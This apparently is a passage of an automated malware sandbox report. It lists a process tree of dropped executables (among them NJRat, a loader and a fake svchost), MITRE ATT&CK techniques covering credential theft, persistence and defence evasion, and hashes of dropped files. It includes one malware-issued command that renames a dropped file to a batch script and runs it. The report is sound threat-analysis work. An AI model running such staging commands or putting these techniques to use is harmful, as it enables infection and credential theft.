  - - C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"
      4⤵
      PID:6740
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 308
      4⤵
      Program crash
      PID:6872
- - C:\Users\Admin\AppData\Local\Temp\Files\FACT0987789000900.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\FACT0987789000900.exe"
    3⤵
    PID:6580
- - C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"
    3⤵
    PID:6924
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
      4⤵
      PID:7164
- - C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"
    3⤵
    PID:2520
- - C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe"
    3⤵
    PID:2928
  - - C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe"
      4⤵
      PID:7128
- - C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
    3⤵
    PID:6192
  - - C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
      "C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
      4⤵
      PID:6668
    - - C:\Users\Admin\AppData\Local\Temp\ARA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ARA.exe"
        5⤵
        
        PID:4168
- - C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
    3⤵
    PID:6700
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      PID:6164
- - C:\Users\Admin\AppData\Local\Temp\Files\donut.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\donut.exe"
    3⤵
    PID:6732
- C:\Users\Admin\AppData\Local\Temp\2C1C.tmp.ssg.exe
  "C:\Users\Admin\AppData\Local\Temp\2C1C.tmp.ssg.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1684
- C:\Users\Admin\AppData\Local\Temp\534D.tmp.zx.exe
  "C:\Users\Admin\AppData\Local\Temp\534D.tmp.zx.exe"
  2⤵
  - Executes dropped EXE
  PID:1224
- - C:\Users\Admin\AppData\Local\Temp\534D.tmp.zx.exe
    "C:\Users\Admin\AppData\Local\Temp\534D.tmp.zx.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3776

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5116

C:\ProgramData\jmmjru\lqxhbat.exe
C:\ProgramData\jmmjru\lqxhbat.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1496
- C:\ProgramData\jmmjru\lqxhbat.exe
  "C:\ProgramData\jmmjru\lqxhbat.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5844

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:1372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5812 -ip 5812
1⤵
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2372 -ip 2372
1⤵
PID:5856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6160

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
1⤵
PID:6472

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
PID:6488

C:\ProgramData\mjxcfla\lqxv.exe
C:\ProgramData\mjxcfla\lqxv.exe
1⤵
PID:6528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 7056 -ip 7056
1⤵
PID:6780

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:6940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
42KB

MD5
5d1d74198d75640e889f0a577bbf31fc

SHA1
c558f0e842c43e6b3bc066916b2f5d860c317ba5

SHA256
ed99c2402ac2ccc1ca9ebf21f10c12ee27e8d33f1e67bea3cb34da9cd0b4b58c

SHA512
6f597153ac153151ff9e3d9f7e8e162f419535a8905592e0f7addb52ac12d2836f63073eb4d1f6f5042cf9a9ea94064d014510941e1f93c8d0f4e5c0f87634fb

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
124B

MD5
c40e58f2374be84d33003bfa70d94058

SHA1
5e8b9a556c818bebd6de00800b4cb8fb5048ec26

SHA256
ce90ab91a53963e87aa263846051e7024d40a3b79e899da8388abfe08211b1f2

SHA512
49dfff7e13ae44d8193ee4799c00987d19787c888bb61b3b33f67ad2d577888e59c2caff01a7562628c4012773f910418a2b3fa4140f249785bad9b752a7d747

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
881d0763ca151736a0a155774e40aa26

SHA1
a5c2e0c2c38a56c3251fe170e5353c13feb473b3

SHA256
a78a35f4c80e116b0c367b889f1aec03f01a54392e236541a62a5ad8771e135e

SHA512
38071a2b9e37ea188257082a4fc8e67ce0f363e28ee585c57ab0fdb4fe38f38e1313e6a9e65d6ee01ef623099e9af2e970b7983dc9ad669f972b24d2bc690592

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
af23961d25b22e9043980f85bb6aab30

SHA1
9b995f89cefbfb7ed1024b7abf2b358ea5817087

SHA256
ec276aba35dd3051990901c582c6c8b575f692c64692a0b931076e865a5e7fe6

SHA512
f0a529fef8815aeaf6a991c51cc74f60049e5cf68bb8b0cc22f08bf121f2ce96deddd689aadea960df0bb2de76dad1eac72d0d51a3dcd1b4931727f3418b5911

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a0ed6e1783d8b42ba0196904f65820c7

SHA1
951f4cfb8a161de0811292048f144a63d87bcccd

SHA256
fe0e33ab6ac0ec3df5292cf0ff883a1672b4de9361548067e5fa56cbbd52107c

SHA512
26915e304d4ed9d349b6019bd2fe230970da2fa9804768a73c46c656926bd5e3e31de73f5aa9220b6318add6f4856f60964240c9867ce2b0aa918a36b1d9eea3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9IEW0KLU\76561199804377619[1].htm

Filesize
25KB

MD5
6dd903e009ed3f08c859339c52839e50

SHA1
892894a334bc8012794d6bce6247b43fbb89f796

SHA256
8386b1d782e915d70dd31bfa8ad368cd808431015584461343ad3e8dc10b7519

SHA512
b565dec901e93c30aebf7371eb8da50b592ae30cb291141b10fadc49a54a3fb3b833a8cd47fd9f89275948e14eae70f010105e1aa1e97b3f828320d404720502

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VKYZDMA5\76561199804377619[1].htm

Filesize
34KB

MD5
bde44d36b6541f682ca1db7d15c6b100

SHA1
96efa74296bb2264ce87fb56ec3b9cb637f6823d

SHA256
264dc26e28c05d1105eba03a6516cd5cd0279fa29f7a26f058374ba2de1a9992

SHA512
0f149efe8d8b63407cae29333c03ee75acd955a7839bf142a3728fa7d634a11fdd1ec9e42a174c73043320157982688a92c7dbde170c8afb9412872125748450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ac7c65c613096664a894a147ea4eb8d4

SHA1
7743a049bf6a3ba5a50da7381705fcde4984e085

SHA256
f3f6e0023822b73bde67ae6b5e35e5e474fd160be4dcdbdc50cc17939d68c4f8

SHA512
9b16ea6c9aa38ebb754e182e6c2241ab2cae1b61c48f6dd0610af943bb40bf760329857a1a8eb236ea0030ddf58bf149a1d722eec27c6e07c22b9a9072b9e93c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
04936173a4dcefec0427d3c41cabddc1

SHA1
23c0c726f7290bbb8fa90f10091a4d6fb9f9ccd1

SHA256
b0f661a3c97d36f40f281ef60a97ed1ba19f334828eba47283738fd5d77c9331

SHA512
859b1644501dd5778a5d3b1ece0f3fe83a965e3af5c7a5c918f4dee7790c11933e35d1c6022acfb0d1f541f54b54ccd618ed41765ad19220c8ae5d4b0ed01b8e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\activity-stream.discovery_stream.json.tmp

Filesize
20KB

MD5
23ccc1331ef760c360a61038480b6f08

SHA1
b104b362dc6c3786a3361b599678c01a96ff6f92

SHA256
87c87a7242ddce6a183edb2843b003d27ea05fdf02b0e3263c2b83534b869166

SHA512
7769b57703a474a929cbfb431216f738867cad6b40b29bb0ece9af95415f17835043e875a6d4e39840c8e6be23f9e549d627fae6753400c9e0b979cfd0be6cb7

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe

Filesize
300KB

MD5
7b6730ca4da283a35c41b831b9567f15

SHA1
92ef2fd33f713d72207209ec65f0de6eef395af5

SHA256
94d7d12ae53ce97f38d8890383c2317ce03d45bd6ecaf0e0b9165c7066cd300c

SHA512
ae2d10f9895e5f2af10b4fa87cdb7c930a531e910b55cd752b15dac77a432cc28eca6e5b32b95eeb21e238aaf2eb57e29474660cae93e734d0b6543c1d462ace

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe

Filesize
302KB

MD5
2682786590a361f965fb7e07170ebe2b

SHA1
57c2c049997bfebb5fae9d99745941e192e71df1

SHA256
50dcab544d9da89056f9a7dcc28e641b743abe6afef1217ee0dfbd11e962e41d

SHA512
9b1dc6ee05a28ef2dc76b7d1ae97202cadcfafd261cf876bb64f546991311f9a36e46620cce9ae8b58bfc8e4de69840618c90a9a3cab56b6660803691c1ff6dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\350944739639

Filesize
86KB

MD5
dbc104a0a702e7ef9e05aad14262e5d4

SHA1
c89276339c856e35e831a9378760e9164539853d

SHA256
bc4863d20e4cb610360cb26755e4b0afac291bae7bd03e1cf08ccfbc3f7dc5b1

SHA512
e241c334975f0fae139ac919ab28633b3feae16461cafb3c022c2bc0af12bf3f637cbc7e27481385b19e923d8b1e4ff4f636a5e8d516f9bc9ec99336d8df20f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\350944739639_Desktop.zip

Filesize
48KB

MD5
99b44be1c4107c19bf3efa7234193b98

SHA1
3b817c0d2d07d12c202958e09fcd83ea6cd96f76

SHA256
c125363a1d834df02655497e0b5d6398b2fe657e7073d6b077d6b31438f0de49

SHA512
e313ef85a699624f5a31ee2340458faf5fa289812ed3f6e9db2c92286addcb022ef68e4ddc2c7c6069fb21010e15bb3ab7d22ffa218309c7681a78b149c42f72

Download Submit
C:\Users\Admin\AppData\Local\Temp\534D.tmp.zx.exe

Filesize
5.6MB

MD5
b40682ddc13c95e3c0228d09a3b6aae2

SHA1
ffbac13d000872dbf5a0bce2b6addf5315e59532

SHA256
f40224ca24a6d189791058779eb4c9bab224caa58b00bd787b1ff981d285d5a4

SHA512
b186331b49e7821466fd003980f9ca57f5bcf41574c1d1893b8949d8a944ffe67f06d8a67d4bfdf4599fcd4f3282c36bed1fc8585e1f8dd541e8fdf121f48eeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ARA.exe

Filesize
1.8MB

MD5
fb10155e44f99861b4f315842aad8117

SHA1
89ac086e93f62d1dbdf35fa34f16d62cd4ca46ed

SHA256
118f5ba14837745eef57bf35ed413aaf13945e8651ebf361304a86b28b0a532c

SHA512
61561ee1c24c060404cfc63e39e114022948650fe3f71399d5f6df643341d9e2c1f0487833b8e7d14b986dde9dbb5e4acd67b6610af2364f03d91f9f1a06f00d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fail.cmd

Filesize
22KB

MD5
4b3a0e1f46e0a61c8bfe9b6619a0d12b

SHA1
5014b84611b06c05f3cefd3f3e74713301a50ffe

SHA256
ecc8abc33adddba1a6fe1dc626698aba572b61fe8a6988ce541ddb7b16f2e7c7

SHA512
540a8c2b3561087afddb79cc4827c0232b8bfc4486dbd535708d76ad6804e2b8526cb28168d717749e1983329ad20567da19ad1283570cdd1e85d676368651c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe

Filesize
297KB

MD5
0279038d1b86b5a268bd51b24a777d15

SHA1
4218e271f2c240b2823f218cf1e5a8f377ea5387

SHA256
666a9667e2a6d8cda89e324f4a63fad303a2719dd27d09a133d41dac44c79b9e

SHA512
bcaace0691de38672f365f20f34b1754d04afa4b346c45cf2a55c7a26651a337a1fdcdcb4706be441ae9e9cb8c69786d4b9117a944273982723a98fbb3fdd178

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

Filesize
234KB

MD5
05cb115e89e2ae51ce12791a7cd399c6

SHA1
125121bd930a78186ebc1941512a36a9482b94e8

SHA256
cfbc551391120e38f4bd4ab1196d34e9f3ef37c2a0c66daa32fed0c7c119c96f

SHA512
a8f23f8f1cb8c72b2a0686a78ca61c107554242abd12eff9ddcd15aedb55631cf77368ad22bea76ab07656d112a858985b4d4f70953b5e11e29501d4bc5463c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe

Filesize
413KB

MD5
7b0a50d5495209fa15500df08a56428f

SHA1
ab792139aaa0344213aa558e53fa056d5923b8f0

SHA256
d7f591f60eea358649cd97b73296b31a682e22fc5784df440026c3086de3d835

SHA512
c1fe0cb875124c9069f01fc3ef44d864ec82cfad49ee733edecd8b9b5e021594937362641aa33d865aa8a3ec376e46162c988906b0cb7bd0666e873988fe3661

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe

Filesize
983KB

MD5
26d737343527707f7e4fbad11ef723ad

SHA1
177c6e44f09beb131d9d8d5a92f07e6099b0ba20

SHA256
079cf111fe3c63bd27b7bb93c589c250e519bea006aea9e0a5be2a9e4503d45e

SHA512
86176b637ced30198fe944235d378d509fbefb6b0789cdd0a4497b02552ef1d659df235de5dde776c9de0f98f892206a290b26855bafed373b1d085ce9afa6bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe

Filesize
320KB

MD5
cb2fbbc83bb274386200401dad510050

SHA1
1fc99b84fb08236956f3605ef035c95963d87523

SHA256
305e2cae3aa79de6e936e51a4d4a16a4ad5a3bffc35915699878185c01282c83

SHA512
69c16364af8a6195af96e28b75dd4147ca2d2fe08a1a42db47805987b370c7974e523cb29d1c6bb8a3b6574afea4c7a9fc107c65e45faf894b3b677d7e0e47b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FACT0987789000900.exe

Filesize
626KB

MD5
e4da22458c317595e4bd6712b4728d36

SHA1
111a5c4cbd45bced7c04cbeb5192a9afe178865c

SHA256
f3530f9d52d1ba3ed70cc5d603cf0a83771027cda5fd545206e1688589ef69fd

SHA512
b19d9eb5e06834538e8ca5e8655e360b56d63c8ad67441607279c18a848d46a6095b6cbe7019fc79eba784392278e30134e7aef149d0e12964d0b86ecd08dc1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe

Filesize
815KB

MD5
1b0fe9739ef19752cb12647b6a4ba97b

SHA1
0672bbdf92feea7db8decb5934d921f8c47c3033

SHA256
151247e9379a755e3bb260cca5c59977e4075d5404db4198f3cec82818412479

SHA512
1c67f07c38c1a1d360675b8c3214ee7ee107bb4b48dbf8d3c2cd2c2cfbf9205847e77d73979a9ef907d1011ef525245ab295aae651c0f48b4368a73af873319b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe

Filesize
214KB

MD5
70bd663276c9498dca435d8e8daa8729

SHA1
9350c1c65d8584ad39b04f6f50154dd8c476c5b4

SHA256
909984d4f2202d99d247b645c2089b014a835d5fe138ccd868a7fc87000d5ba1

SHA512
03323ffe850955b46563d735a97f926fdf435afc00ddf8475d7ab277a92e9276ab0b5e82c38d5633d6e9958b147c188348e93aa55fb4f10c6a6725b49234f47f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe

Filesize
3.3MB

MD5
7aed36391d90c5d9fe10fd84316b3792

SHA1
986d854d0f65a05a13a6f40a183fde23294766a6

SHA256
606294151ec0d40f67298b3fb2b2ab9e47459ab27852188e7ee124f9addd3197

SHA512
a9a1c60dccc94f484a9598c53c5469dfc58b77efdf9a98fd58c102ff07830da2eba8f72ddc702cef68fa00dc74eac8a44448c56bff6213f199e56b7329a30d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe

Filesize
31KB

MD5
29a37b6532a7acefa7580b826f23f6dd

SHA1
a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f

SHA256
7a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69

SHA512
a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\PO076567890000.exe

Filesize
1.1MB

MD5
45d4f85bfcf9eaadcdc9da89ea21faef

SHA1
ba12ee157c8c1bcaa9539dde411a2135c3b7e2f3

SHA256
cec4f49a5374bf025bd1ccd700897e017be1e67ca6bc248dae9131a85db91c42

SHA512
0d2d3b3f64981561c3bcb17440cb926a759bc84379f1d41ff267d8568abcb7318774ecd55fedd4fe59c98a9eed103297d6ec7342c0635d00b83a2804ee8f4878

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe

Filesize
810KB

MD5
87c051a77edc0cc77a4d791ef72367d1

SHA1
5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5

SHA256
b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c

SHA512
259a3f823d5051fcc9e87ceacf25557ab17f5d26ff4f0c17801d9ef83a23d2a51261a73e5ba9c3caf1ca2feb18a569458f17a2a5d56b542b86d6a124a42d4c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe

Filesize
465KB

MD5
760370c2aa2829b5fec688d12da0535f

SHA1
269f86ff2ce1eb1eeed20075f0b719ee779e8fbb

SHA256
a3a6cde465591377afc5f656f72a00799398fd2541b60391bcb8f62b8f8cace3

SHA512
1e63051694056ffcd3aa22edb2bef3bb30401edc784b82101f5dc7f69756b994e84e309a13bdb64b6e92516e895648ee34598de70e8882569d79dbfdab61a847

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe

Filesize
1.0MB

MD5
25ed0fce4a9df59b3ed88853db8206f3

SHA1
4382f0adb2a94e8a4eccd6aa2d222842000b7895

SHA256
c5b32f1cdc2a48f1dd2b1623598c24a2635dc57fdab3b4328f1cb3b66f5079ba

SHA512
5a329229506e3f9feaefbe477699cc4b8510f949f4b1df0bf5b66ac892404a94fa5effef3d9acbdfa90bb6e494e5799fa721e14a29ec4e0f1e7b97719397939f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe

Filesize
108KB

MD5
ffc2637acde7b6db1823a2b3304a6c6c

SHA1
8eac6fb5415f9338b1b131c42ed15ea70da22096

SHA256
35efc0520b78a1b413afee5dbe5d8b0674eea2acfc7d943de70a99b5b2fd92ef

SHA512
3f9f0182d69b66ea6168717f8e7239a0726066e011be1983da874f76ee308e67ef55cd08a2d8990cd9e4a663bbbbf56c3445275d72e8330255b3d0dd3b98859a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

Filesize
59KB

MD5
cf14fac9fa45e4989ad1db2910ed98fd

SHA1
9e6381b831257bebf6356984e6ac3764aee72a84

SHA256
3df057f43a8c20c88fe2a2266ac09414fcf9dac4037e9a4f6e95ab66e6409636

SHA512
184a88c77ee9e8254cbe4489447d89a710b057efa6fe9f0510a93da91e200dd6717416b275140b31301fed6800884cc62b7941854565c96462f109dd7f972e0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ctx.exe

Filesize
431KB

MD5
4962575a2378d5c72e7a836ea766e2ad

SHA1
549964178b12017622d3cbdda6dbfdef0904e7e2

SHA256
eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676

SHA512
911a59f7a6785dd09a57dcd6d977b8abd5e160bd613786e871a1e92377c9e6f3b85fe3037431754bbdb1212e153776efca5fadac1de6b2ad474253da176e8e53

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\donut.exe

Filesize
242KB

MD5
2a516c444620354c81fd32ef1b498d1b

SHA1
961d3a6a0588e654dd72d00a3331c684cf8e627c

SHA256
ee68d7deb7cefdfca66c078d6036d7aa3aa7afcc62b282999034b4a1faed890d

SHA512
e8e4bc395997eb6e83e147816faf00ae959e091acba6d896b007781bdc9146157d049d958f9ff7b71a746ed681bd4dcca2fd84aac3eb76c4afe41d49e9f7bd2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe

Filesize
65KB

MD5
7f20b668a7680f502780742c8dc28e83

SHA1
8e49ea3b6586893ecd62e824819da9891cda1e1b

SHA256
9334ce1ad264ddf49a2fe9d1a52d5dd1f16705bf076e2e589a6f85b6cd848bb2

SHA512
80a8b05f05523b1b69b6276eb105d3741ae94c844a481dce6bb66ee3256900fc25f466aa6bf55fe0242eb63613e8bd62848ba49cd362dbdd8ae0e165e9d5f01c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe

Filesize
898KB

MD5
c02798b26bdaf8e27c1c48ef5de4b2c3

SHA1
bc59ab8827e13d1a9a1892eb4da9cf2d7d62a615

SHA256
af41b9ac95c32686ba1ef373929b54f49088e5c4f295fe828b43b32b5160aa78

SHA512
b541aeedcc4db6f8e0db0788f2791339476a863c15efc72aef3db916fc7c8ab41d84c0546c05b675be4d7700c4f986dbae5e2858d60ecd44b4ffbcae2065cfc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\gjawedrtg.exe

Filesize
1.2MB

MD5
2608d0b5f67ee059ea327017ce8d631e

SHA1
f9721bab8a76eac88792365e964d2fa374d3af33

SHA256
5dc1453281984e87ef8b36a4989f9d4a1780e6b8b55fc9ca874eab8c17102aa6

SHA512
d0a0c15a91eb627d7a9b83e5e7009ca4a3968e669c4b109833fb6282c0d09f993c692a8fd7cb9a2ab6eb968fadce6d9c09d1f0515fd7a691040a7295199c08b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe

Filesize
629KB

MD5
f8b9bbe568f4f8d307effddb44d4c6b3

SHA1
4bd7686eca3eeaffe79c4261aef9cebee422e8fd

SHA256
50104b13a245621a1a0291eac4f9eb9c010fae46cc511b936d6f3b42a398cab3

SHA512
56c692e195771b02f9cf45786b233e2d996561360a5402577651a67c538c94a5f3e58925ba6e671515a8dd0dbcf1c0917b53d86d5ae6d2bc8dfd30ed5e60b9bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\jet.exe

Filesize
75KB

MD5
1cd1defd8e963254a5f0d84aec85a75e

SHA1
fb0f7f965f0336e166fcd60d4fc9844e2a6c27df

SHA256
5cc691ddb8accd10a0eeaddc6d6f3853e2dac335e452140c26dd02ba312cd1a8

SHA512
810b964bba69abe66994d7e6bd6c0774c9f8e23a9fafd783255186ce3709fcfca0c1ffa600de0149eda58a46c27f5d1f5c8c08a78b138407911b9c05edacfaee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\krgawdtyjawd.exe

Filesize
239KB

MD5
d4a8ad6479e437edc9771c114a1dc3ac

SHA1
6e6970fdcefd428dfe7fbd08c3923f69e21e7105

SHA256
a018a52ca34bf027ae3ef6b4121ec5d79853f84253e3fad161c36459f566ac2b

SHA512
de181dc79ca4c52ce8de3abc767fbb8b4fd6904d278fa310eee4a66056161c0b9960ef7bebf2ebf6a9d19b653190895e5d1df92c314ca04af748351d6fb53e07

Download Submit
